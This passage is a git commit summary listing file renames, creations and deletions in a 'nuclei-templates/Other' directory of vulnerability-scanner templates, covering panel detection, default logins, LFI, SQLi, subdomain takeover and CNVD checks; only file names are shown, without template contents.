nuclei-templates/Other/{acrolinx-dashboard-38.yaml => acrolinx-dashboard-37.yaml} (100%) rename nuclei-templates/Other/{active-admin-exposure-43.yaml => active-admin-exposure.yaml} (100%) rename nuclei-templates/Other/{activemq-default-login-46.yaml => activemq-default-login-48.yaml} (100%) create mode 100644 nuclei-templates/Other/activemq-panel-53.yaml delete mode 100644 nuclei-templates/Other/activemq-panel.yaml create mode 100644 nuclei-templates/Other/acunetix-panel-54.yaml delete mode 100644 nuclei-templates/Other/acunetix-panel-59.yaml delete mode 100644 nuclei-templates/Other/adb-backup-enabled-60.yaml create mode 100644 nuclei-templates/Other/adb-backup-enabled-61.yaml rename nuclei-templates/Other/{addeventlistener-detect-64.yaml => addeventlistener-detect-65.yaml} (100%) create mode 100644 nuclei-templates/Other/adiscon-loganalyzer-67.yaml delete mode 100644 nuclei-templates/Other/adiscon-loganalyzer-70.yaml delete mode 100644 nuclei-templates/Other/adminer-panel-74.yaml create mode 100644 nuclei-templates/Other/adminer-panel-75.yaml rename nuclei-templates/Other/{adminset-panel-80.yaml => adminset-panel.yaml} (100%) create mode 100644 nuclei-templates/Other/adobe-component-login-89.yaml delete mode 100644 nuclei-templates/Other/adobe-component-login-91.yaml create mode 100644 nuclei-templates/Other/adobe-component-login-92.yaml delete mode 100644 nuclei-templates/Other/adobe-component-login.yaml create mode 100644 nuclei-templates/Other/adobe-connect-central-login-96.yaml delete mode 100644 nuclei-templates/Other/adobe-connect-central-login-97.yaml rename nuclei-templates/Other/{adobe-connect-version.yaml => adobe-connect-version-104.yaml} (100%) delete mode 100644 nuclei-templates/Other/adobe-experience-manager-login-109.yaml create mode 100644 nuclei-templates/Other/adobe-experience-manager-login.yaml rename nuclei-templates/Other/{adobe-media-server-112.yaml => adobe-media-server-110.yaml} (100%) delete mode 100644 nuclei-templates/Other/advanced-access-manager-lfi-116.yaml create mode 100644 nuclei-templates/Other/advanced-access-manager-lfi-118.yaml delete mode 100644 nuclei-templates/Other/aem-cached-pages-130.yaml create mode 100644 nuclei-templates/Other/aem-cached-pages.yaml rename nuclei-templates/Other/{aem-crx-bypass.yaml => aem-crx-bypass-133.yaml} (100%) create mode 100644 nuclei-templates/Other/aem-default-login-140.yaml delete mode 100644 nuclei-templates/Other/aem-default-login-142.yaml rename nuclei-templates/Other/{aem-detection-146.yaml => aem-detection-145.yaml} (100%) rename nuclei-templates/Other/{aem-gql-servlet-150.yaml => aem-gql-servlet-149.yaml} (100%) delete mode 100644 nuclei-templates/Other/aem-groovyconsole.yaml create mode 100644 nuclei-templates/Other/aem-hash-querybuilder-159.yaml delete mode 100644 nuclei-templates/Other/aem-hash-querybuilder-161.yaml delete mode 100644 nuclei-templates/Other/aem-login-status-170.yaml create mode 100644 nuclei-templates/Other/aem-login-status-171.yaml rename nuclei-templates/Other/{aem-merge-metadata-servlet-172.yaml => aem-merge-metadata-servlet-174.yaml} (100%) create mode 100644 nuclei-templates/Other/aem-misconfig.yaml rename nuclei-templates/Other/{aem-querybuilder-feed-servlet-177.yaml => aem-querybuilder-feed-servlet-175.yaml} (100%) delete mode 100644 nuclei-templates/Other/aem-querybuilder-internal-path-read-179.yaml create mode 100644 nuclei-templates/Other/aem-querybuilder-internal-path-read-180.yaml delete mode 100644 nuclei-templates/Other/aem-querybuilder-json-servlet-182.yaml create mode 100644 nuclei-templates/Other/aem-querybuilder-json-servlet-185.yaml rename nuclei-templates/Other/{aem-setpreferences-xss-188.yaml => aem-setpreferences-xss.yaml} (100%) create mode 100644 nuclei-templates/Other/aem-userinfo-servlet-190.yaml delete mode 100644 nuclei-templates/Other/aem-userinfo-servlet.yaml create mode 100644 nuclei-templates/Other/aem-wcm-suggestions-servlet-194.yaml delete mode 100644 nuclei-templates/Other/aem-wcm-suggestions-servlet-196.yaml delete mode 100644 nuclei-templates/Other/aem_misconfig.yaml rename nuclei-templates/Other/{aerohive-netconfig-ui-201.yaml => aerohive-netconfig-ui-199.yaml} (100%) delete mode 100644 nuclei-templates/Other/aftership-takeover-204.yaml create mode 100644 nuclei-templates/Other/aftership-takeover-205.yaml create mode 100644 nuclei-templates/Other/aha-takeover-217.yaml delete mode 100644 nuclei-templates/Other/aha-takeover.yaml rename nuclei-templates/Other/{aims-password-mgmt-client-219.yaml => aims-password-mgmt-client-221.yaml} (100%) delete mode 100644 nuclei-templates/Other/aims-password-portal-222.yaml create mode 100644 nuclei-templates/Other/aims-password-portal.yaml delete mode 100644 nuclei-templates/Other/airee-takeover-226.yaml create mode 100644 nuclei-templates/Other/airee-takeover-228.yaml create mode 100644 nuclei-templates/Other/airflow-configuration-exposure-230.yaml delete mode 100644 nuclei-templates/Other/airflow-configuration-exposure.yaml rename nuclei-templates/Other/{airflow-debug-231.yaml => airflow-debug.yaml} (100%) delete mode 100644 nuclei-templates/Other/airflow-detect-239.yaml create mode 100644 nuclei-templates/Other/airflow-detect.yaml rename nuclei-templates/Other/{Airflow-unauthorized.yaml => airflow-unauthorized.yaml} (100%) delete mode 100644 nuclei-templates/Other/akamai-cloudtest-252.yaml create mode 100644 nuclei-templates/Other/akamai-cloudtest-253.yaml create mode 100644 nuclei-templates/Other/alibaba-anyproxy-fileread.yaml delete mode 100644 nuclei-templates/Other/alibaba-canal-info-leak-266.yaml create mode 100644 nuclei-templates/Other/alibaba-canal-info-leak.yaml rename nuclei-templates/Other/{alibaba-mongoshake-unauth-268.yaml => alibaba-mongoshake-unauth.yaml} (100%) create mode 100644 nuclei-templates/Other/alphaweb-default-login-277.yaml delete mode 100644 nuclei-templates/Other/alphaweb-default-login.yaml create mode 100644 nuclei-templates/Other/amazon-docker-config-280.yaml delete mode 100644 nuclei-templates/Other/amazon-docker-config.yaml create mode 100755 nuclei-templates/Other/amazon-mws-auth-token-11845.yaml delete mode 100644 nuclei-templates/Other/amazon-mws-auth-token-value.yaml delete mode 100644 nuclei-templates/Other/ambari-default-credentials-285.yaml create mode 100644 nuclei-templates/Other/ambari-default-credentials.yaml create mode 100644 nuclei-templates/Other/ambari-exposure-293.yaml delete mode 100644 nuclei-templates/Other/ambari-exposure-294.yaml rename nuclei-templates/Other/{ametys-admin-login-301.yaml => ametys-admin-login-300.yaml} (100%) create mode 100644 nuclei-templates/Other/amministrazione-aperta-lfi-303.yaml delete mode 100644 nuclei-templates/Other/amministrazione-aperta-lfi.yaml delete mode 100644 nuclei-templates/Other/ampps-admin-panel-304.yaml create mode 100644 nuclei-templates/Other/ampps-admin-panel-305.yaml rename nuclei-templates/Other/{AMSS-sqli.yaml => amss-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/android-debug-database-exposed-315.yaml create mode 100644 nuclei-templates/Other/android-debug-database-exposed.yaml delete mode 100644 nuclei-templates/Other/anima-takeover-318.yaml create mode 100644 nuclei-templates/Other/anima-takeover-319.yaml rename nuclei-templates/Other/{Anni-fileDownload.yaml => anni-filedownload.yaml} (100%) create mode 100644 nuclei-templates/Other/announcekit-takeover-322.yaml delete mode 100644 nuclei-templates/Other/announcekit-takeover-324.yaml delete mode 100644 nuclei-templates/Other/ansible-config-disclosure-326.yaml create mode 100644 nuclei-templates/Other/ansible-config-disclosure.yaml rename nuclei-templates/Other/{ansible-semaphore-panel-327.yaml => ansible-semaphore-panel.yaml} (100%) rename nuclei-templates/Other/{ansible-tower-exposure-329.yaml => ansible-tower-exposure.yaml} (100%) delete mode 100644 nuclei-templates/Other/antsword-backdoor-334.yaml create mode 100644 nuclei-templates/Other/antsword-backdoor-335.yaml rename nuclei-templates/Other/{AolynkBR304-weakPass.yaml => aolynkbr304-weakpass.yaml} (100%) delete mode 100644 nuclei-templates/Other/apache-axis-detect-339.yaml create mode 100644 nuclei-templates/Other/apache-axis-detect.yaml create mode 100644 nuclei-templates/Other/apache-cocoon-detect-342.yaml delete mode 100644 nuclei-templates/Other/apache-cocoon-detect.yaml delete mode 100644 nuclei-templates/Other/apache-detect-346.yaml create mode 100644 nuclei-templates/Other/apache-detect-347.yaml delete mode 100644 nuclei-templates/Other/apache-filename-enum-354.yaml create mode 100644 nuclei-templates/Other/apache-filename-enum.yaml create mode 100644 nuclei-templates/Other/apache-flink-unauth-rce-356.yaml delete mode 100644 nuclei-templates/Other/apache-flink-unauth-rce-359.yaml create mode 100644 nuclei-templates/Other/apache-ofbiz-log4j-rce-366.yaml delete mode 100644 nuclei-templates/Other/apache-ofbiz-log4j-rce.yaml create mode 100644 nuclei-templates/Other/apache-solr-file-read.yaml delete mode 100644 nuclei-templates/Other/apache-solr-log4j-rce-372.yaml create mode 100644 nuclei-templates/Other/apache-solr-log4j-rce.yaml delete mode 100644 nuclei-templates/Other/apache-tomcat-CVE-2022-34305.yaml create mode 100644 nuclei-templates/Other/apache-tomcat-cve-2022-34305.yaml create mode 100644 nuclei-templates/Other/apc-ups-login-382.yaml delete mode 100644 nuclei-templates/Other/apc-ups-login.yaml rename nuclei-templates/Other/{apc-info-378.yaml => apc_info.yaml} (100%) create mode 100644 nuclei-templates/Other/api-adafruit-io-387.yaml delete mode 100644 nuclei-templates/Other/api-adafruit-io.yaml create mode 100644 nuclei-templates/Other/api-apigee-edge-391.yaml delete mode 100644 nuclei-templates/Other/api-apigee-edge.yaml delete mode 100644 nuclei-templates/Other/api-appveyor-392.yaml create mode 100644 nuclei-templates/Other/api-appveyor.yaml delete mode 100644 nuclei-templates/Other/api-bible-394.yaml create mode 100644 nuclei-templates/Other/api-bible.yaml delete mode 100644 nuclei-templates/Other/api-bitrise-397.yaml create mode 100644 nuclei-templates/Other/api-bitrise.yaml create mode 100644 nuclei-templates/Other/api-blockchain-398.yaml delete mode 100644 nuclei-templates/Other/api-blockchain.yaml delete mode 100644 nuclei-templates/Other/api-buildkite.yaml delete mode 100644 nuclei-templates/Other/api-buttercms-403.yaml delete mode 100644 nuclei-templates/Other/api-calendly.yaml create mode 100644 nuclei-templates/Other/api-clearbit-407.yaml delete mode 100644 nuclei-templates/Other/api-clearbit.yaml create mode 100644 nuclei-templates/Other/api-coinapi-408.yaml delete mode 100644 nuclei-templates/Other/api-coinapi.yaml create mode 100644 nuclei-templates/Other/api-dbt-413.yaml delete mode 100644 nuclei-templates/Other/api-dbt.yaml create mode 100644 nuclei-templates/Other/api-debounce-414.yaml delete mode 100644 nuclei-templates/Other/api-debounce.yaml create mode 100644 nuclei-templates/Other/api-deviantart-415.yaml delete mode 100644 nuclei-templates/Other/api-deviantart.yaml delete mode 100644 nuclei-templates/Other/api-dribbble-416.yaml create mode 100644 nuclei-templates/Other/api-dribbble-417.yaml delete mode 100644 nuclei-templates/Other/api-dropbox-418.yaml create mode 100644 nuclei-templates/Other/api-dropbox.yaml create mode 100644 nuclei-templates/Other/api-facebook-422.yaml delete mode 100644 nuclei-templates/Other/api-facebook.yaml create mode 100644 nuclei-templates/Other/api-fastly-423.yaml delete mode 100644 nuclei-templates/Other/api-fastly-424.yaml create mode 100644 nuclei-templates/Other/api-fontawesome-426.yaml delete mode 100644 nuclei-templates/Other/api-fontawesome.yaml create mode 100644 nuclei-templates/Other/api-github-429.yaml delete mode 100644 nuclei-templates/Other/api-github.yaml create mode 100644 nuclei-templates/Other/api-google-drive-432.yaml delete mode 100644 nuclei-templates/Other/api-google-drive.yaml create mode 100644 nuclei-templates/Other/api-heroku-435.yaml delete mode 100644 nuclei-templates/Other/api-heroku.yaml create mode 100644 nuclei-templates/Other/api-hubspot-437.yaml delete mode 100644 nuclei-templates/Other/api-iconfinder-438.yaml create mode 100644 nuclei-templates/Other/api-iconfinder-439.yaml delete mode 100644 nuclei-templates/Other/api-instatus-442.yaml create mode 100644 nuclei-templates/Other/api-instatus.yaml create mode 100644 nuclei-templates/Other/api-iterable-445.yaml rename nuclei-templates/Other/{api-leanix-450.yaml => api-leanix.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-linkedin-451.yaml create mode 100644 nuclei-templates/Other/api-linkedin.yaml delete mode 100644 nuclei-templates/Other/api-linkfinder.yaml rename nuclei-templates/Other/{api-malshare-456.yaml => api-malshare.yaml} (100%) create mode 100644 nuclei-templates/Other/api-mapbox-465.yaml delete mode 100644 nuclei-templates/Other/api-mojoauth-466.yaml create mode 100644 nuclei-templates/Other/api-mojoauth.yaml create mode 100644 nuclei-templates/Other/api-npm-471.yaml create mode 100644 nuclei-templates/Other/api-onelogin-472.yaml delete mode 100644 nuclei-templates/Other/api-onelogin.yaml delete mode 100644 nuclei-templates/Other/api-openweather-473.yaml delete mode 100644 nuclei-templates/Other/api-pagerduty-475.yaml create mode 100644 nuclei-templates/Other/api-pastebin-477.yaml delete mode 100644 nuclei-templates/Other/api-pastebin.yaml delete mode 100644 nuclei-templates/Other/api-paypal-478.yaml create mode 100644 nuclei-templates/Other/api-paypal.yaml delete mode 100644 nuclei-templates/Other/api-petfinder-480.yaml create mode 100644 nuclei-templates/Other/api-petfinder.yaml delete mode 100644 nuclei-templates/Other/api-postmark.yaml create mode 100644 nuclei-templates/Other/api-quip-484.yaml delete mode 100644 nuclei-templates/Other/api-quip.yaml rename nuclei-templates/Other/{api-rijksmuseum.yaml => api-rijksmuseum-485.yaml} (100%) create mode 100644 nuclei-templates/Other/api-slack.yaml delete mode 100644 nuclei-templates/Other/api-square-496.yaml delete mode 100644 nuclei-templates/Other/api-sslmate-497.yaml create mode 100644 nuclei-templates/Other/api-sslmate.yaml create mode 100644 nuclei-templates/Other/api-stytch-500.yaml delete mode 100644 nuclei-templates/Other/api-stytch.yaml rename nuclei-templates/Other/{api-thecatapi-503.yaml => api-thecatapi.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-twitter.yaml rename nuclei-templates/Other/{api-urlscan-508.yaml => api-urlscan-509.yaml} (100%) rename nuclei-templates/Other/{api-virustotal.yaml => api-virustotal-512.yaml} (100%) delete mode 100644 nuclei-templates/Other/api-visualstudio-513.yaml delete mode 100644 nuclei-templates/Other/api-weglot-516.yaml create mode 100644 nuclei-templates/Other/api-weglot.yaml create mode 100644 nuclei-templates/Other/apollo-adminservice.yaml delete mode 100644 nuclei-templates/Other/apollo-default-login-520.yaml create mode 100644 nuclei-templates/Other/apollo-default-login-521.yaml delete mode 100644 nuclei-templates/Other/appspec-yml-disclosure-527.yaml create mode 100644 nuclei-templates/Other/appspec-yml-disclosure.yaml rename nuclei-templates/Other/{arcgis-panel-530.yaml => arcgis-panel-531.yaml} (100%) rename nuclei-templates/Other/{arcgis-rest-api.yaml => arcgis-rest-api-533.yaml} (100%) rename nuclei-templates/Other/{argocd-login-536.yaml => argocd-login-534.yaml} (100%) delete mode 100644 nuclei-templates/Other/arl-default-login-539.yaml create mode 100644 nuclei-templates/Other/arl-default-login.yaml create mode 100644 nuclei-templates/Other/artica-web-proxy-detect-543.yaml delete mode 100644 nuclei-templates/Other/artica-web-proxy-detect.yaml rename nuclei-templates/Other/{artifactory_deploy.yaml => artifactory-anonymous-deploy.yaml} (100%) create mode 100644 nuclei-templates/Other/asanhamayesh-lfi-552.yaml delete mode 100644 nuclei-templates/Other/asanhamayesh-lfi-553.yaml create mode 100644 nuclei-templates/Other/aspose-file-download-561.yaml delete mode 100644 nuclei-templates/Other/aspose-file-download.yaml rename nuclei-templates/Other/{aspose-pdf-file-download.yaml => aspose-pdf-file-download-566.yaml} (100%) create mode 100644 nuclei-templates/Other/aspose-words-file-download-571.yaml delete mode 100644 nuclei-templates/Other/aspose-words-file-download.yaml create mode 100644 nuclei-templates/Other/asustor-adm-sqli.yaml delete mode 100644 nuclei-templates/Other/athd-dvr-fileread.yaml create mode 100644 nuclei-templates/Other/atlassian-crowd-panel-581.yaml delete mode 100644 nuclei-templates/Other/atlassian-crowd-panel-585.yaml rename nuclei-templates/Other/{atvise-login-591.yaml => atvise-login-590.yaml} (100%) delete mode 100644 nuclei-templates/Other/autobahn-python-detect-595.yaml create mode 100644 nuclei-templates/Other/autobahn-python-detect.yaml rename nuclei-templates/Other/{automation-direct-596.yaml => automation-direct-597.yaml} (100%) create mode 100644 nuclei-templates/Other/avantfax-detect-598.yaml delete mode 100644 nuclei-templates/Other/avantfax-detect-600.yaml delete mode 100644 nuclei-templates/Other/avantfax-panel-601.yaml create mode 100644 nuclei-templates/Other/avantfax-panel-603.yaml rename nuclei-templates/Other/{avatier-password-management.yaml => avatier-password-management-605.yaml} (100%) rename nuclei-templates/Other/{avtech-avn801-camera-panel.yaml => avtech-avn801-camera-panel-612.yaml} (100%) create mode 100644 nuclei-templates/Other/aws-access-key-value-621.yaml delete mode 100644 nuclei-templates/Other/aws-access-key-value-622.yaml delete mode 100644 nuclei-templates/Other/aws-bucket-takeover-630.yaml create mode 100644 nuclei-templates/Other/aws-bucket-takeover-631.yaml rename nuclei-templates/Other/{aws-ecs-container-agent-tasks.yaml => aws-ecs-container-agent-tasks-640.yaml} (100%) create mode 100644 nuclei-templates/Other/aws-elastic-beanstalk-detect-644.yaml delete mode 100644 nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml rename nuclei-templates/Other/{aws-object-listing-648.yaml => aws-object-listing-645.yaml} (100%) create mode 100644 nuclei-templates/Other/aws-redirect-651.yaml delete mode 100644 nuclei-templates/Other/aws-redirect-654.yaml rename nuclei-templates/Other/{awstats-config-656.yaml => awstats-config-655.yaml} (100%) rename nuclei-templates/Other/{awstats-script.yaml => awstats-script-658.yaml} (100%) delete mode 100644 nuclei-templates/Other/axigen-webmail-662.yaml create mode 100644 nuclei-templates/Other/axigen-webmail-664.yaml create mode 100644 nuclei-templates/Other/axiom-digitalocean-key-exposure-666.yaml delete mode 100644 nuclei-templates/Other/axiom-digitalocean-key-exposure.yaml rename nuclei-templates/Other/{azkaban-web-client-679.yaml => azkaban-web-client.yaml} (100%) delete mode 100644 nuclei-templates/Other/bak.yaml rename nuclei-templates/Other/{bash.yaml => bash-scanner.yaml} (100%) rename nuclei-templates/Other/{basic-auth-detection.yaml => basic-auth-detection-687.yaml} (100%) create mode 100644 nuclei-templates/Other/basic-xss-prober-696.yaml delete mode 100644 nuclei-templates/Other/basic-xss-prober.yaml create mode 100644 nuclei-templates/Other/basic_sqli.yaml delete mode 100644 nuclei-templates/Other/bems-api-lfi-711.yaml create mode 100644 nuclei-templates/Other/bems-api-lfi.yaml delete mode 100644 nuclei-templates/Other/beyondtrust-login-server-719.yaml create mode 100644 nuclei-templates/Other/beyondtrust-login-server.yaml delete mode 100644 nuclei-templates/Other/bigbluebutton-login-725.yaml create mode 100644 nuclei-templates/Other/bigbluebutton-login-726.yaml rename nuclei-templates/Other/{bigcartel-takeover.yaml => bigcartel-takeover-728.yaml} (100%) delete mode 100644 nuclei-templates/Other/bigip-config-utility-detect-733.yaml create mode 100644 nuclei-templates/Other/bigip-config-utility-detect.yaml rename nuclei-templates/Other/{bigip-detection-735.yaml => bigip-detection.yaml} (100%) rename nuclei-templates/Other/{api-bitly-396.yaml => bitly.yaml} (100%) create mode 100644 nuclei-templates/Other/bitrix-open-redirect-743.yaml delete mode 100644 nuclei-templates/Other/bitrix-open-redirect-744.yaml delete mode 100644 nuclei-templates/Other/bitrix-panel-748.yaml create mode 100644 nuclei-templates/Other/bitrix-panel-750.yaml create mode 100644 nuclei-templates/Other/bitrix_bak_check.yaml create mode 100644 nuclei-templates/Other/blind-xss.yaml rename nuclei-templates/Other/{blue-iris-login-751.yaml => blue-iris-login-754.yaml} (100%) delete mode 100644 nuclei-templates/Other/blue-ocean-excellence-lfi-755.yaml create mode 100644 nuclei-templates/Other/blue-ocean-excellence-lfi-758.yaml delete mode 100644 nuclei-templates/Other/boa-web-fileread.yaml create mode 100644 nuclei-templates/Other/bolt-cms-panel-763.yaml delete mode 100644 nuclei-templates/Other/bolt-cms-panel.yaml delete mode 100644 nuclei-templates/Other/bower-json-769.yaml create mode 100644 nuclei-templates/Other/bower-json-770.yaml rename nuclei-templates/Other/{braintree-access-token.yaml => braintree-access-token-773.yaml} (100%) delete mode 100644 nuclei-templates/Other/brandfolder-lfi-776.yaml create mode 100644 nuclei-templates/Other/brandfolder-lfi.yaml create mode 100644 nuclei-templates/Other/brandfolder-open-redirect-780.yaml delete mode 100644 nuclei-templates/Other/brandfolder-open-redirect.yaml rename nuclei-templates/Other/{brother-printer-detect-790.yaml => brother-printer-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/browserless-debugger-794.yaml create mode 100644 nuclei-templates/Other/browserless-debugger-795.yaml create mode 100644 nuclei-templates/Other/buddy-panel-797.yaml delete mode 100644 nuclei-templates/Other/buddy-panel.yaml rename nuclei-templates/Other/{buffalo-config-injection-800.yaml => buffalo-config-injection-801.yaml} (100%) create mode 100644 nuclei-templates/Other/buildkite.yaml delete mode 100644 nuclei-templates/Other/bullwark-momentum-lfi-808.yaml create mode 100644 nuclei-templates/Other/bullwark-momentum-lfi.yaml delete mode 100644 nuclei-templates/Other/burp-api-detect-812.yaml create mode 100644 nuclei-templates/Other/burp-api-detect.yaml rename nuclei-templates/Other/{businessintelligence-default-login-816.yaml => businessintelligence-default-login-817.yaml} (100%) create mode 100644 nuclei-templates/Other/buttercms.yaml create mode 100644 nuclei-templates/Other/cab-fare-calculator-lfi-819.yaml delete mode 100644 nuclei-templates/Other/cab-fare-calculator-lfi.yaml rename nuclei-templates/Other/{cache-poisoning-821.yaml => cache_piossing.yaml} (100%) rename nuclei-templates/Other/{cacti-detect.yaml => cacti-detect-826.yaml} (100%) rename nuclei-templates/Other/{cacti-panel.yaml => cacti-panel-828.yaml} (100%) delete mode 100644 nuclei-templates/Other/caddy-open-redirect-837.yaml create mode 100644 nuclei-templates/Other/caddy-open-redirect.yaml create mode 100644 nuclei-templates/Other/calendly.yaml rename nuclei-templates/Other/{call-break-cms.yaml => call-break-cms-840.yaml} (100%) delete mode 100644 nuclei-templates/Other/campaignmonitor-843.yaml create mode 100644 nuclei-templates/Other/campaignmonitor-844.yaml create mode 100644 nuclei-templates/Other/can-i-take-over-dns-852.yaml delete mode 100644 nuclei-templates/Other/can-i-take-over-dns-853.yaml delete mode 100644 nuclei-templates/Other/candidate-application-lfi-850.yaml create mode 100644 nuclei-templates/Other/candidate-application-lfi-851.yaml delete mode 100644 nuclei-templates/Other/canny-takeover-854.yaml create mode 100644 nuclei-templates/Other/canny-takeover-856.yaml create mode 100644 nuclei-templates/Other/carestream-vue-detect-860.yaml delete mode 100644 nuclei-templates/Other/carestream-vue-detect-861.yaml delete mode 100644 nuclei-templates/Other/cargo-takeover-868.yaml create mode 100644 nuclei-templates/Other/cargo-takeover.yaml create mode 100644 nuclei-templates/Other/cargocollective-takeover-862.yaml delete mode 100644 nuclei-templates/Other/cargocollective-takeover-864.yaml delete mode 100644 nuclei-templates/Other/cas-login-870.yaml create mode 100644 nuclei-templates/Other/cas-login.yaml create mode 100644 nuclei-templates/Other/casbin.yaml delete mode 100644 nuclei-templates/Other/cerebro-panel-881.yaml create mode 100644 nuclei-templates/Other/cerebro-panel.yaml rename nuclei-templates/Other/{certificate-validation-882.yaml => certificate-validation-884.yaml} (100%) create mode 100644 nuclei-templates/Other/cf7-message-filter.yaml create mode 100644 nuclei-templates/Other/cgi-printenv-885.yaml delete mode 100644 nuclei-templates/Other/cgi-printenv-886.yaml create mode 100644 nuclei-templates/Other/cgi-test-page-887.yaml delete mode 100644 nuclei-templates/Other/cgi-test-page.yaml delete mode 100644 nuclei-templates/Other/chamilo-lms-sqli-892.yaml create mode 100644 nuclei-templates/Other/chamilo-lms-sqli.yaml delete mode 100644 nuclei-templates/Other/chamilo-lms-xss-893.yaml create mode 100644 nuclei-templates/Other/chamilo-lms-xss.yaml rename nuclei-templates/Other/{chanjet-crm-sqli.yaml => chanjet-CRM-sqli.yaml} (100%) rename nuclei-templates/Other/{checkmarx-panel-895.yaml => checkmarx-panel-897.yaml} (100%) rename nuclei-templates/Other/{checkpoint-panel-899.yaml => checkpoint-panel.yaml} (100%) create mode 100644 nuclei-templates/Other/cherry-file-download-900.yaml delete mode 100644 nuclei-templates/Other/cherry-file-download.yaml delete mode 100644 nuclei-templates/Other/cherry-lfi-902.yaml create mode 100644 nuclei-templates/Other/cherry-lfi-903.yaml rename nuclei-templates/Other/{chevereto-detect.yaml => chevereto-detect-905.yaml} (100%) delete mode 100644 nuclei-templates/Other/chinaunicom-default-login-906.yaml create mode 100644 nuclei-templates/Other/chinaunicom-default-login-908.yaml delete mode 100644 nuclei-templates/Other/churchope-lfi-915.yaml create mode 100644 nuclei-templates/Other/churchope-lfi.yaml create mode 100644 nuclei-templates/Other/circarlife-setup-917.yaml delete mode 100644 nuclei-templates/Other/circarlife-setup.yaml delete mode 100644 nuclei-templates/Other/circleci-config-924.yaml create mode 100644 nuclei-templates/Other/circleci-config-925.yaml create mode 100644 nuclei-templates/Other/circleci-ssh-config-928.yaml delete mode 100644 nuclei-templates/Other/circleci-ssh-config.yaml rename nuclei-templates/Other/{cisco-ace-device-manager-929.yaml => cisco-ace-device-manager-931.yaml} (100%) delete mode 100644 nuclei-templates/Other/cisco-asa-panel-932.yaml create mode 100644 nuclei-templates/Other/cisco-asa-panel-934.yaml delete mode 100644 nuclei-templates/Other/cisco-edge-340-936.yaml create mode 100644 nuclei-templates/Other/cisco-edge-340.yaml delete mode 100644 nuclei-templates/Other/cisco-finesse-login-940.yaml create mode 100644 nuclei-templates/Other/cisco-finesse-login.yaml delete mode 100644 nuclei-templates/Other/cisco-integrated-login-943.yaml create mode 100644 nuclei-templates/Other/cisco-integrated-login.yaml rename nuclei-templates/Other/{cisco-meraki-exposure-944.yaml => cisco-meraki-exposure.yaml} (100%) create mode 100644 nuclei-templates/Other/cisco-network-config-950.yaml delete mode 100644 nuclei-templates/Other/cisco-network-config.yaml rename nuclei-templates/Other/{cisco-prime-infrastructure-954.yaml => cisco-prime-infrastructure-952.yaml} (100%) delete mode 100644 nuclei-templates/Other/cisco-sd-wan-957.yaml create mode 100644 nuclei-templates/Other/cisco-sd-wan.yaml rename nuclei-templates/Other/{cisco-secure-desktop-960.yaml => cisco-secure-desktop-962.yaml} (100%) create mode 100644 nuclei-templates/Other/cisco-sendgrid-965.yaml delete mode 100644 nuclei-templates/Other/cisco-sendgrid-967.yaml delete mode 100644 nuclei-templates/Other/cisco-smi-exposure-970.yaml create mode 100644 nuclei-templates/Other/cisco-smi-exposure.yaml rename nuclei-templates/Other/{cisco-systems-login.yaml => cisco-systems-login-975.yaml} (100%) delete mode 100644 nuclei-templates/Other/cisco-telepresence-976.yaml create mode 100644 nuclei-templates/Other/cisco-telepresence.yaml rename nuclei-templates/Other/{cisco-ucs-kvm-login.yaml => cisco-ucs-kvm-login-980.yaml} (100%) delete mode 100644 nuclei-templates/Other/citrix-adc-gateway-detect-981.yaml create mode 100644 nuclei-templates/Other/citrix-adc-gateway-detect.yaml create mode 100644 nuclei-templates/Other/citrix-vpn-detect-987.yaml delete mode 100644 nuclei-templates/Other/citrix-vpn-detect.yaml delete mode 100644 nuclei-templates/Other/cl-te-http-smuggling.yaml rename nuclei-templates/Other/{clave-login-panel-996.yaml => clave-login-panel-994.yaml} (100%) rename nuclei-templates/Other/{clearpass-policy-manager-1000.yaml => clearpass-policy-manager-997.yaml} (100%) delete mode 100644 nuclei-templates/Other/clickhouse-unauth-1002.yaml create mode 100644 nuclei-templates/Other/clickhouse-unauth.yaml create mode 100644 nuclei-templates/Other/clientaccesspolicy-1005.yaml delete mode 100644 nuclei-templates/Other/clientaccesspolicy-1007.yaml create mode 100644 nuclei-templates/Other/clockwork-dashboard-exposure-1015.yaml delete mode 100644 nuclei-templates/Other/clockwork-dashboard-exposure.yaml create mode 100644 nuclei-templates/Other/clockwork-php-page-1019.yaml delete mode 100644 nuclei-templates/Other/clockwork-php-page.yaml rename nuclei-templates/Other/{cloudflare-image-ssrf.yaml => cloudflare-image-ssrf-1021.yaml} (100%) rename nuclei-templates/Other/{cloudinary-1026.yaml => cloudinary-1025.yaml} (100%) create mode 100644 nuclei-templates/Other/cname-service-detection-1031.yaml delete mode 100644 nuclei-templates/Other/cname-service-detection-1032.yaml rename nuclei-templates/Other/{cname-service-detector.yaml => cname-service-detector-1034.yaml} (100%) create mode 100644 nuclei-templates/Other/cnvd-2018-13393-1037.yaml delete mode 100644 nuclei-templates/Other/cnvd-2018-13393-1038.yaml rename nuclei-templates/Other/{CNVD-2019-01348.yaml => cnvd-2019-01348-1044.yaml} (100%) delete mode 100644 nuclei-templates/Other/cnvd-2019-06255-1049.yaml create mode 100644 nuclei-templates/Other/cnvd-2019-06255-1050.yaml delete mode 100644 nuclei-templates/Other/cnvd-2019-17294.yaml delete mode 100644 nuclei-templates/Other/cnvd-2019-19299-1051.yaml create mode 100644 nuclei-templates/Other/cnvd-2019-19299-1052.yaml rename nuclei-templates/Other/{CNVD-2019-32204.yaml => cnvd-2019-32204-1054.yaml} (100%) create mode 100644 nuclei-templates/Other/cnvd-2020-46552-1060.yaml delete mode 100644 nuclei-templates/Other/cnvd-2020-46552.yaml create mode 100644 nuclei-templates/Other/cnvd-2020-56167-1064.yaml delete mode 100644 nuclei-templates/Other/cnvd-2020-62422-1067.yaml create mode 100644 nuclei-templates/Other/cnvd-2020-62422-1069.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-10543-1082.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-10543-1084.yaml rename nuclei-templates/Other/{cnvd-2021-15822-1092.yaml => cnvd-2021-15822-1093.yaml} (100%) create mode 100644 nuclei-templates/Other/cnvd-2021-15824-1096.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-15824-1097.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-17369-1102.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-26422-1103.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-26422-1104.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-30167-1108.yaml 